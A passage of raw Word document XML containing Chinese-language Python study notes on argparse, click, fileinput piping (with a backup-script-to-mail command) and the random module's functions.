        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>action="store_true"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36399434" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>args = parser.parse_args()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F762A9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>if args.verbose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0290CA16" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print("verbosity turned on")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A5558F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="468" w:name="_Toc159779911"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多选一选项</w:t>
      </w:r>
      <w:bookmarkEnd w:id="468"/>
    </w:p>
    <w:p w14:paraId="6CCFFED4" w14:textId="43A6E565" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1984"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import argparse</w:t>
      </w:r>
      <w:r w:rsidR="005D5539">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="026FFE7A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>parser = argparse.ArgumentParser()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D822F11" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>parser.add_argument("square", type=int,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2654611E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    help="display a square of a given number")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1E8063" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">parser.add_argument("-v", "--verbosity", type=int, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>choices=[0, 1, 2]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43300A31" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    help="increase output verbosity")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2503C46E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>args = parser.parse_args()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C938681" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="469" w:name="_Toc159779912"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>click</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：命令行传参</w:t>
      </w:r>
      <w:bookmarkEnd w:id="469"/>
    </w:p>
    <w:p w14:paraId="629BD4D5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第三方库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> click</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，需要在函数头顶写装饰器。然后需要给函数传参。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F40E4A5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，传参的时候都是字符，在函数中需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等转一下类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47904BAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05B445D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中还要注意的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，该类型，传参只要有值就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE793E7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22220679" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>import click</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5F05AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E69C71D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>@click.command()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B089ABE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>@click.option('--pool', default='16', required=True, help='Pool\'s num.1 --pool 20')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44256AED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def main(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>pool</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A83E255" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pool xxxx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608EC7B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6090CCD0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="470" w:name="_Toc159779913"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fileinput</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：管道</w:t>
      </w:r>
      <w:bookmarkEnd w:id="470"/>
    </w:p>
    <w:p w14:paraId="2E0E21C7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以直接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">bash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>脚本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.sh | python3 mail.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本会接收重定向内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F329D71" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03CEE334" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import fileinput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EEEBC7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    stdin = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D7F961" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    with fileinput.input(openhook=fileinput.hook_encoded(encoding='gbk')) as f_input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0286A7AD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        for line in f_input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DB5C7C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            stdin += line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3477C336" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    resApart = MIMEApplication(stdin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7188C800" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="276D94F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行命令如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F7E5F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>/usr/bin/bash /root/shenyanjian_sudo/sca_backup_scripts/Full_backup_monthly/full_backup_monthly_2_FTP.sh | /usr/bin/python3 /root/shenyanjian_sudo/sca_backup_scripts/Full_backup_monthly/mail.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3D738C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66867449" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="471" w:name="_Toc159779914"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>随机数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> random</w:t>
      </w:r>
      <w:bookmarkEnd w:id="471"/>
    </w:p>
    <w:p w14:paraId="4F27F7B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>随机数的取值区间一般为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>左闭右开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5760ED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="472" w:name="_Toc159779915"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>random</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库</w:t>
      </w:r>
      <w:bookmarkEnd w:id="472"/>
    </w:p>
    <w:p w14:paraId="722E5370" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://blog.csdn.net/qq_31279347/article/details/82795405</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7643ECBD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>random.random()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DE1502" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>random.random()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于生成一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的随机浮点数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: 0 &lt;= n &lt; 1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D8BB6E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="059B2C4D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">random.sample() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>随机返回固定长度的序列</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFF486F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sample()</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:t>中随机模块的内置函数，它返回从序列中选择的特定长度的项目列表，即列表、元组、字符串或集合。用于无放回的随机抽样。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588AA895" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A72494C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例见</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>swagger</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的一处代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D72DB66" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def index(language):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A57BC62" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    language = language.lower().strip()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E2DDD5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    features = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1465133E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        "awesome", "great", "dynamic",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049FE35B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        "simple", "powerful", "amazing",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E1C585" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        "perfect", "beauty", "lovely"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64634047" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA5D024" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>size = int(request.args.get('size', 1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2EC194" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if language in ['php', 'vb', 'visualbasic', 'actionscript']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC5360F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return "An error occurred, invalid language for awesomeness", 500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB7E1D8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return jsonify(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F601A2D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        language=language,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D8E9D1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>features=random.sample(features, size)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> # size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>是从请求中看有啥参数来的，然后这个作为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>sample</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>的第二个参数表示从第一个参数的序列中随机抽几个。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508EDCFA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C04BCC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="532896F1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>random.uniform()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5733807A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>random.uniform(a, b)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，用于生成一个指定范围内的随机符点数，两个参数其中一个是上限，一个是下限。如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
